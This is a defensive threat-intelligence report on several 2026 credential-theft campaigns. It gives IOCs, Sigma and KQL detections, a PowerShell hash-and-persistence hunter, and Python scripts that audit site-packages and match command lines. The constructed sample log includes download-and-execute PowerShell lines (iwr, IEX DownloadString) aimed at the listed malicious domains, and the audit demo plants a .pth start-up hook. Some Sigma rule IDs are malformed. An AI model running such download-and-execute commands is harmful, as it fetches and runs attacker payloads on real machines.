Recent OTX pulses reveal a convergence of sophisticated credential theft operations targeting financial and technology sectors. These campaigns are driven by the commoditization of malware through Malware-as-a-Service (MaaS) models like SilabRAT and Needle, alongside widespread social engineering abusing the current AI hype cycle.
- Campaign 1 (AI Impersonation): Storm-3075 is leveraging interest in AI platforms (ChatGPT, Claude, Copilot) via malvertising and SEO poisoning to distribute Vidar, Lumma Stealer, and GhostSocks. The objective is credential harvesting and financial fraud.
- Campaign 2 (SilabRAT MaaS): Threat actor o1oo1 is marketing SilabRAT on dark web forums ($5,000/mo). This advanced RAT uses Hidden VNC (hVNC) for invisible remote control and browser profile cloning to bypass MFA, specifically targeting cryptocurrency wallets.
- Campaign 3 (Supply Chain): A supply chain attack affecting PyPI and npm is distributing Hades, Mini Shai-Hulud, and Miasma worms. By using typosquatted packages and trojanized native extensions, attackers are targeting bioinformatics and MCP developers to steal credentials and maintain persistence.
- Campaign 4 (Social Media): Vidar Stealer distribution has expanded to TikTok and Instagram Reels. Fake software tutorials lure victims into running PowerShell commands that download the payload.
- Campaign 5 (Needle C2): A modular crypto-stealing platform dubbed "Needle" was found with exposed C2 keys. It impersonates wallet apps (MetaMask, Exodus) to steal cryptocurrency via browser extension spoofers and Rust-based agents.
Threat Actor / Malware Profile
SilabRAT (Actor: o1oo1)
- Distribution: Sold on dark web forums; likely distributed via phishing or initial access brokers.
- Payload Behavior: Remote Access Trojan (RAT) featuring Hidden VNC (hVNC) for stealthy remote control.
- C2 Communication: Connects to C2 infrastructure (e.g., 91.199.163.124) to receive commands and exfiltrate data.
- Persistence Mechanism: Uses HijackLoader for execution and likely registry run keys or scheduled tasks.
- Anti-Analysis: Uses AsmCrypt for obfuscation to evade detection.
- Objective: Credential theft, session hijacking (cookie cloning), and cryptocurrency wallet draining.
Vidar Stealer & Lumma Stealer (Actor: Storm-3075)
- Distribution: Malvertising (impersonating AI brands), SEO poisoning, fake TikTok tutorials.
- Payload Behavior: Information stealer targeting browser data, saved passwords, cookies, and cryptocurrency wallets. Often delivered via Hijack Loader or Oyster.
- C2 Communication: Exfiltrates stolen data to C2 servers; domains observed include brokeapt.com.
- Persistence: Often temporary; executed via loader or user-initiated script.
- Anti-Analysis: Uses packers and loaders to hinder static analysis.
- Objective: Bulk credential harvesting for sale on dark web markets or immediate fraud.
Supply Chain Worms (Hades, Miasma)
- Distribution: Malicious PyPI wheels (.abi3.so extensions) and npm packages targeting developers.
- Payload Behavior: Python-based worms that execute on import or via startup hooks. They steal environment variables, SSH keys, and credentials.
- C2 Communication: Reports back to actor-controlled infrastructure.
- Persistence: Infects the Python environment, ensuring execution on system startup or developer environment usage.
- Anti-Analysis: Uses split loader-payload architecture to evade signature detection.
- Objective: Compromise developer environments to steal source code and credentials.
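The two persistence tricks listed for these worms (code that runs on import of a trojanized native extension, and start-up hooks that run every time the interpreter starts) both leave artifacts in site-packages that can be enumerated. The following audit script is an added example, not tooling from this report or from the research it cites: it builds a constructed site-packages tree in a temporary directory (the package names benignpkg and seqtools, the .pth files and the placeholder .abi3.so bytes are all invented) so it runs offline, and the same scan_site_packages() function can be pointed at a real site-packages directory.

```python
"""Audit a Python environment for the persistence patterns this report attributes to
the Hades/Miasma worms: start-up hooks and native extensions inside installed packages.

Added example, not part of the original report. The sample tree built by
build_sample_environment() is constructed for the demonstration.
"""
import tempfile
from pathlib import Path


def find_pth_hooks(site_packages: Path):
    """Python's site module executes every line of a *.pth file that begins with
    'import' at interpreter start-up, which makes such lines a start-up hook."""
    hooks = []
    for pth in sorted(site_packages.glob("*.pth")):
        for lineno, line in enumerate(pth.read_text(errors="replace").splitlines(), 1):
            if line.startswith(("import ", "import\t")):
                hooks.append((pth.name, lineno, line.strip()))
    return hooks


def find_native_extensions(site_packages: Path):
    """List compiled extension modules (.so/.pyd) and whether each is a stable-ABI
    .abi3.so build, the form the report names for the trojanized wheels."""
    found = []
    for path in site_packages.rglob("*"):
        if path.is_file() and path.suffix in (".so", ".pyd"):
            rel = path.relative_to(site_packages).as_posix()
            found.append((rel, path.name.endswith(".abi3.so")))
    return sorted(found)


def find_customize_modules(site_packages: Path):
    """sitecustomize.py / usercustomize.py are imported automatically on start-up."""
    return sorted(p.name for p in site_packages.glob("*customize.py"))


def scan_site_packages(site_packages) -> dict:
    """Collect every start-up hook and native extension found under one site-packages dir."""
    sp = Path(site_packages)
    return {
        "pth_hooks": find_pth_hooks(sp),
        "native_extensions": find_native_extensions(sp),
        "customize_modules": find_customize_modules(sp),
    }


def build_sample_environment(root) -> Path:
    """Constructed sample tree (invented names): a pure-Python package, a package
    shipping a stable-ABI extension, a harmless path-only .pth, and a .pth that
    carries an import hook."""
    sp = Path(root) / "site-packages"
    (sp / "benignpkg").mkdir(parents=True)
    (sp / "benignpkg" / "__init__.py").write_text("VERSION = '1.0'\n")
    (sp / "seqtools").mkdir()
    (sp / "seqtools" / "__init__.py").write_text("from ._fast import *\n")
    # placeholder bytes standing in for a compiled extension; not a real binary
    (sp / "seqtools" / "_fast.abi3.so").write_bytes(b"\x7fELF" + b"\0" * 12)
    (sp / "mylib.pth").write_text("/opt/mylib\n")
    (sp / "zzz_seqtools_init.pth").write_text("import seqtools._boot; seqtools._boot.run()\n")
    return sp


def scan_sample_environment() -> dict:
    """Build the constructed tree in a temp dir and scan it (used for the demo and tests)."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_site_packages(build_sample_environment(tmp))


if __name__ == "__main__":
    for key, items in scan_sample_environment().items():
        print(f"{key}: {items}")
```

The output is a review queue, not a verdict: legitimate tooling also uses import lines in .pth files (setuptools ships one), so each hook and extension should be cross-checked against the RECORD file of the distribution that claims it and against the package's published wheel contents.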
IOC Analysis
The provided IOCs include:
- Domains: brokeapt.com, msget.run, d4ug.site (used for C2 or payload delivery).
- IPs: 91.199.163.124 (SilabRAT C2).
- Hostnames: pan.rongtv.xyz, pan.ssffaa19.xyz (likely payload hosting).
- File Hashes (SHA1/SHA256): Multiple hashes for SilabRAT loaders, Vidar samples, and Hades worms.
Operational Guidance: SOC teams should immediately block these domains and IPs at the perimeter and firewall. File hashes should be uploaded to EDR solutions for quarantine. The PowerShell commands associated with the TikTok campaign (downloading from msget.run) should be added to script block logging detection rules.
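A script block logging rule for the TikTok campaign is only as good as its handling of the command line it sees. The matcher below is an added example, not code from this report: it applies the report's own indicators (the download cmdlets and the domains msget.run, d4ug.site and brokeapt.com) to command lines of the kind captured by PowerShell script block logging (Event ID 4104) or process creation telemetry, and additionally decodes -EncodedCommand payloads, since a base64-encoded UTF-16LE command hides the domain from a plain substring match. The hostnames, users and command lines in SAMPLE_LOG are constructed for the demonstration.

```python
"""Match PowerShell download activity against the indicators in this report.

Added example, not part of the original report. SAMPLE_LOG is constructed telemetry.
"""
import base64
import re

# Indicators listed in the report
IOC_DOMAINS = ("msget.run", "d4ug.site", "brokeapt.com")
DOWNLOAD_VERBS = ("invoke-webrequest", "iwr", "wget", "downloadstring")

# Matches -e / -ec / -enc / -EncodedCommand followed by a base64 blob
_ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def encode_command(script: str) -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand (base64 of UTF-16LE).
    Used here only to build the constructed sample log entry."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> str:
    """Return the command line with any -EncodedCommand payload decoded and appended,
    so later matching sees the hidden content as well as the visible arguments."""
    match = _ENCODED_RE.search(cmdline)
    if not match:
        return cmdline
    try:
        decoded = base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline  # not valid base64/UTF-16: keep the raw line
    return f"{cmdline} {decoded}"


def match_download_iocs(cmdline: str) -> dict:
    """Mirror the report's Sigma logic: flag only when a download cmdlet AND an IOC
    domain both appear. Returns what matched so an analyst can see why."""
    text = decode_encoded_command(cmdline).lower()
    verbs = sorted(v for v in DOWNLOAD_VERBS if re.search(r"\b" + re.escape(v) + r"\b", text))
    domains = sorted(d for d in IOC_DOMAINS if d in text)
    return {"verbs": verbs, "domains": domains, "flagged": bool(verbs and domains)}


def triage_log(entries):
    """Run the matcher over records shaped like (host, user, command_line) and return
    the flagged ones together with the verbs and domains that matched."""
    hits = []
    for host, user, cmd in entries:
        result = match_download_iocs(cmd)
        if result["flagged"]:
            hits.append((host, user, result["verbs"], result["domains"]))
    return hits


# Constructed sample telemetry (hostnames, users and commands are invented)
SAMPLE_LOG = [
    ("WS-01", "alice", 'powershell.exe -NoP -w hidden "iwr http://msget.run/setup.ps1 -OutFile $env:TEMP\\s.ps1"'),
    ("WS-02", "bob", "powershell.exe Invoke-WebRequest https://www.python.org/ftp/python/ -OutFile py.exe"),
    ("WS-03", "carol", "powershell.exe -EncodedCommand "
     + encode_command("IEX (New-Object Net.WebClient).DownloadString('http://d4ug.site/a')")),
    ("WS-04", "dave", "ping brokeapt.com"),
]

if __name__ == "__main__":
    for host, user, verbs, domains in triage_log(SAMPLE_LOG):
        print(f"{host} {user}: verbs={verbs} domains={domains}")
```

WS-02 (a download from an unrelated site) and WS-04 (an IOC domain with no download cmdlet) are deliberately left unflagged, matching the all-of-selections condition in the Sigma rule; WS-03 is caught only because the encoded command is decoded before matching.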
Detection Engineering
Sigma Rules
---
title: Potential Malicious PyPI Package Import (Hades/Miasma)
id: 8c6d4e12-1f3a-4b5c-9e8d-2f3a4b5c6d7e
description: Detects execution of Python modules importing from suspicious known malicious packages or suspicious .so extension loading patterns associated with Hades/Miasma worms.
status: experimental
date: 2026/06/11
author: Security Arsenal
references:
  - https://socket.dev/blog/mini-shai-hulud-miasma-and-hades-worms-target-bioinformatics-and-mcp-developers-via-malicious
tags:
  - attack.execution
  - attack.t1059.006
logsource:
  category: process_creation
  product: windows
detection:
  selection_python:
    Image|endswith: '\python.exe'
    CommandLine|contains:
      - '-c'
      - 'import'
  selection_suspicious_packages:
    CommandLine|contains:
      - 'mini-shai-hulud'
      - 'miasma'
      - 'hades'
      - 'bioinformatics'
  selection_so_load:
    CommandLine|contains: '.abi3.so'
  # Require a python process AND at least one worm-specific indicator;
  # a python.exe -c import on its own is normal developer activity.
  condition: selection_python and (selection_suspicious_packages or selection_so_load)
falsepositives:
  - Legitimate bioinformatics research or developer activity
level: high
---
title: PowerShell Download from Suspicious Tutorials (Vidar Stealer)
id: 9d7e5f23-2g4b-5c6d-0f9e-3g4b5c6d7e8f
description: Detects PowerShell commands downloading files from domains associated with fake TikTok/Instagram software tutorials distributing Vidar.
status: experimental
date: 2026/06/11
author: Security Arsenal
references:
  - https://www.infosecurity-magazine.com/news/fake-software-videos-tiktok-vidar/
tags:
  - attack.execution
  - attack.t1059.001
logsource:
  category: process_creation
  product: windows
detection:
  selection_pwsh:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
  selection_download:
    CommandLine|contains:
      - 'Invoke-WebRequest'
      - 'iwr'
      - 'wget'
      - 'DownloadString'
  selection_iocs:
    CommandLine|contains:
      - 'msget.run'
      - 'd4ug.site'
      - 'brokeapt.com'
  condition: all of selection_*
falsepositives:
  - Unknown
level: critical
---
title: SilabRAT C2 Connection Pattern
id: 0e8f6a34-3h5c-6d7e-1f0g-4h5c6d7e8f9g
description: Detects network connections to known SilabRAT C2 infrastructure associated with the o1oo1 threat actor.
status: experimental
date: 2026/06/11
author: Security Arsenal
references:
  - https://www.group-ib.com/blog/silabrat-hijackloader-trojan-malware/
tags:
  - attack.command_and_control
  - attack.t1071.001
logsource:
  category: network_connection
  product: windows
detection:
  selection_ip:
    # Whole /24 around the observed C2 91.199.163.124
    DestinationIp|cidr: '91.199.163.0/24'
  selection_port:
    DestinationPort: 443
  condition: all of selection_*
falsepositives:
  - Rare, legitimate traffic to this IP block should be investigated.
level: high
KQL (Microsoft Sentinel)
// Hunt for PowerShell downloads from known Vidar Stealer domains
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("powershell.exe", "pwsh.exe")
| where ProcessCommandLine has_any ("Invoke-WebRequest", "DownloadString", "iwr", "wget")
| where ProcessCommandLine has_any ("msget.run", "d4ug.site", "brokeapt.com")
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName
| order by Timestamp desc

// Hunt for network connections to SilabRAT C2 IP
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteIP == "91.199.163.124"
| project Timestamp, DeviceName, RemoteIP, RemotePort, RemoteUrl, InitiatingProcessFileName
| order by Timestamp desc

// Hunt for potential malicious Python processes loading suspicious extensions
// (".abi3.so" rather than ".so", which would also match ".json", ".sock" and similar)
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName endswith "python.exe"
| where ProcessCommandLine contains ".abi3.so" or ProcessCommandLine contains "import"
| where ProcessCommandLine matches regex @"mini-shai-hulud|miasma|hades"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, FolderPath
| order by Timestamp desc
PowerShell Hunt Script
# SilabRAT and Vidar Persistence & Artifact Hunter
# Checks for file presence of known IOCs and suspicious persistence mechanisms
# The IOC list mixes one SHA1 (40 hex chars) with SHA256 (64 hex chars) values, so each
# file is hashed with whichever algorithm matches the indicator length.
$Hashes = @(
    "4f5c5b3ef45cfff7721754487a86aeff9a2e6e32",
    "0a26238f6c516de5885457c93042531aa59bc206a9537cebf5267cedc6c68531",
    "25270cc429ada8028b5b33220ed412c47907ecceea7377d608fac5af01bed56a",
    "3a6adbe0081b2488e0f137496e92591e0c29148154b2d99faadab9cc435b879b",
    "fb56e66920c84ef9e51db0ea23144f5755daef97cbff8613b05ab56d0dc9d623"
)
$Domains = @(
    "brokeapt.com",
    "msget.run",
    "d4ug.site"
)
$Sha1Hashes   = @($Hashes | Where-Object { $_.Length -eq 40 })
$Sha256Hashes = @($Hashes | Where-Object { $_.Length -eq 64 })

function Get-FileHashByPath {
    param ($Path, $Algorithm = 'SHA256')
    try {
        # -ErrorAction Stop turns locked or unreadable files into a catchable error
        return (Get-FileHash -Path $Path -Algorithm $Algorithm -ErrorAction Stop).Hash.ToLower()
    } catch {
        return $null
    }
}

Write-Host "[+] Scanning for malicious file hashes..."
$Drives = Get-PSDrive -PSProvider FileSystem | Select-Object -ExpandProperty Root
foreach ($Drive in $Drives) {
    Get-ChildItem -Path $Drive -Recurse -File -ErrorAction SilentlyContinue | Where-Object {
        $_.Length -gt 0 -and $_.Extension -match '^\.(exe|dll|ps1|so)$'
    } | ForEach-Object {
        $Sha256 = Get-FileHashByPath -Path $_.FullName -Algorithm SHA256
        if ($Sha256 -and $Sha256 -in $Sha256Hashes) {
            Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName) | SHA256: $Sha256" -ForegroundColor Red
        }
        if ($Sha1Hashes.Count -gt 0) {
            $Sha1 = Get-FileHashByPath -Path $_.FullName -Algorithm SHA1
            if ($Sha1 -and $Sha1 -in $Sha1Hashes) {
                Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName) | SHA1: $Sha1" -ForegroundColor Red
            }
        }
    }
}

Write-Host "[+] Checking Hosts file for malicious domains..."
$HostsPath = "$env:SystemRoot\System32\drivers\etc\hosts"
if (Test-Path $HostsPath) {
    $HostsContent = Get-Content $HostsPath -ErrorAction SilentlyContinue
    foreach ($Domain in $Domains) {
        # -SimpleMatch so the dots in the domain are not treated as regex wildcards
        if ($HostsContent | Select-String -SimpleMatch -Pattern $Domain) {
            Write-Host "[!] SUSPICIOUS ENTRY IN HOSTS FILE: $Domain" -ForegroundColor Yellow
        }
    }
}

Write-Host "[+] Checking for suspicious persistence mechanisms (Run keys)..."
$RunPaths = @(
    "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run",
    "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
)
# Metadata properties Get-ItemProperty adds to every result; these are not registry values
$MetaProps = @('PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider')
foreach ($Path in $RunPaths) {
    if (-not (Test-Path $Path)) { continue }
    $Key = Get-ItemProperty -Path $Path
    foreach ($Prop in $Key.PSObject.Properties) {
        if ($Prop.Name -in $MetaProps) { continue }
        $Value = [string]$Prop.Value
        foreach ($Domain in $Domains) {
            if ($Value -like "*$Domain*") {
                Write-Host "[!] SUSPICIOUS RUN KEY: $($Prop.Name) = $Value" -ForegroundColor Yellow
            }
        }
    }
}
Response Priorities
- Immediate:
  - Block all identified IOCs (Domains: brokeapt.com, msget.run, d4ug.site; IP: 91.199.163.124) at the proxy, firewall, and DNS sinkhole level.
  - Scan endpoints for the listed file hashes associated with SilabRAT, Vidar, and Needle.
  - Identify and quarantine systems exhibiting PowerShell behavior matching the Sigma rules above.
- 24h:
  - Initiate credential resets for accounts accessed from infected endpoints, specifically targeting those with access to cryptocurrency wallets or high-value financial systems.
  - Review browser extension logs and installed extensions for unauthorized "MetaMask" or "Trust Wallet" impersonators (Needle campaign).
  - Hunt for Python environments that may have installed malicious packages (Hades/Miasma) in developer workstations.
- 1 Week:
  - Implement application allowlisting for PowerShell execution and strict egress filtering for developer workstations.
  - Conduct security awareness training focused on "AI Brand" phishing and the dangers of downloading software from social media tutorials.
  - Harden the software supply chain by requiring dependency verification (SBOM) for all internal PyPI and npm package usage.